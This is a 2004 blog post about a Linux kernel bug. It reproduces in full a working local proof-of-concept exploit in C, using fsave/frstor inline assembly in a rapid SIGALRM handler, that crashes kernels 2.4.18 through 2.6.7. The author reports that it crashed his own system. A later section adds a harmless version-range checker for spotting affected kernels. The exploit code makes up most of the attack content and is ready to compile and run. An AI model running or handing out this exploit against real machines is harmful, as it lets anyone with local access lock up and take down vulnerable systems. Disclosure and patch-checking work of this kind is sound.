posted on Wednesday, June 16, 2004 3:43 PM
by
demiliani
Crashing the Linux Kernel
These days a big alarm has gone up on the Linux Kernel newsgroup: a bug in the Linux kernel allows a small, simple C program to crash the kernel (both 2.4.2x and 2.6.x kernels on the x86 and x86_64 architectures), effectively locking up the whole system.
The small program is this:
/* --------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* SIGALRM handler: save the FPU state into a 108-byte buffer with fsave,
 * then restore it with frstor; the inline frstor is what hits the kernel
 * bug described in the header above. */
static void TakeDown(int ignore)
{
    char fpubuf[108];
    // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
    __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;

    /* Deliver SIGALRM every 100 microseconds so the handler runs repeatedly. */
    signal(SIGALRM, TakeDown);
    spec.it_interval.tv_sec = 0;
    spec.it_interval.tv_usec = 100;
    spec.it_value.tv_sec = 0;
    spec.it_value.tv_usec = 100;
    setitimer(ITIMER_REAL, &spec, NULL);

    /* Keep the process busy between signals. */
    while (1)
        write(1, ".", 1);
    return 0;
}
// <<EOF
and I can say that it works well (my Debian has crashed).
Obviously... as usual, when a serious failure like this concerns a Linux system, the rumours stay quiet... can you imagine the clamour if this failure had been discovered in a Windows kernel?
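For an administrator the first question is which machines fall into the affected range. The following is an added example, not code from the post or from the PoC authors: it parses a kernel release string, compares it against the range the PoC header states (2.4.18 through 2.6.7 inclusive, taken here as exact bounds, which is an assumption), and checks the running kernel via uname(2). The sample release strings in main are constructed for illustration.

```c
#include <stdio.h>
#include <sys/utsname.h>

/* Parse the leading "major.minor.patch" of a kernel release string such as
 * "2.6.7" or "2.4.26-1-686"; anything after the third number is ignored.
 * Returns 1 on success, 0 if the string does not start with three numbers. */
int parse_kernel_release(const char *release, int *major, int *minor, int *patch)
{
    return sscanf(release, "%d.%d.%d", major, minor, patch) == 3;
}

/* Three-way comparison of two versions: <0, 0 or >0, like strcmp. */
static int compare_version(int a1, int a2, int a3, int b1, int b2, int b3)
{
    if (a1 != b1) return a1 < b1 ? -1 : 1;
    if (a2 != b2) return a2 < b2 ? -1 : 1;
    if (a3 != b3) return a3 < b3 ? -1 : 1;
    return 0;
}

/* Affected range taken from the PoC header: 2.4.18 through 2.6.7 inclusive
 * (assumption: those bounds are exact). Returns 1 if the release is inside
 * the range, 0 if outside, -1 if the string cannot be parsed. */
int kernel_in_affected_range(const char *release)
{
    int major, minor, patch;
    if (!parse_kernel_release(release, &major, &minor, &patch))
        return -1;
    if (compare_version(major, minor, patch, 2, 4, 18) < 0)
        return 0;
    if (compare_version(major, minor, patch, 2, 6, 7) > 0)
        return 0;
    return 1;
}

/* Check the kernel this program is running on; same return convention. */
int running_kernel_affected(void)
{
    struct utsname u;
    if (uname(&u) != 0)
        return -1;
    return kernel_in_affected_range(u.release);
}

int main(void)
{
    /* Constructed sample release strings, one per outcome. */
    const char *samples[] = { "2.4.17", "2.4.18", "2.6.7-rc2", "2.6.8", "not-a-version" };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-14s -> %d\n", samples[i], kernel_in_affected_range(samples[i]));
    printf("running kernel -> %d\n", running_kernel_affected());
    return 0;
}
```

Treat the result as an inventory hint rather than proof: distributions often backport a fix without changing the version number in uname, so a release inside the range may already be patched, and a plain numeric comparison also counts the 2.5.x development series as in range even though the post says nothing about it.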
HERE you can find all the details about...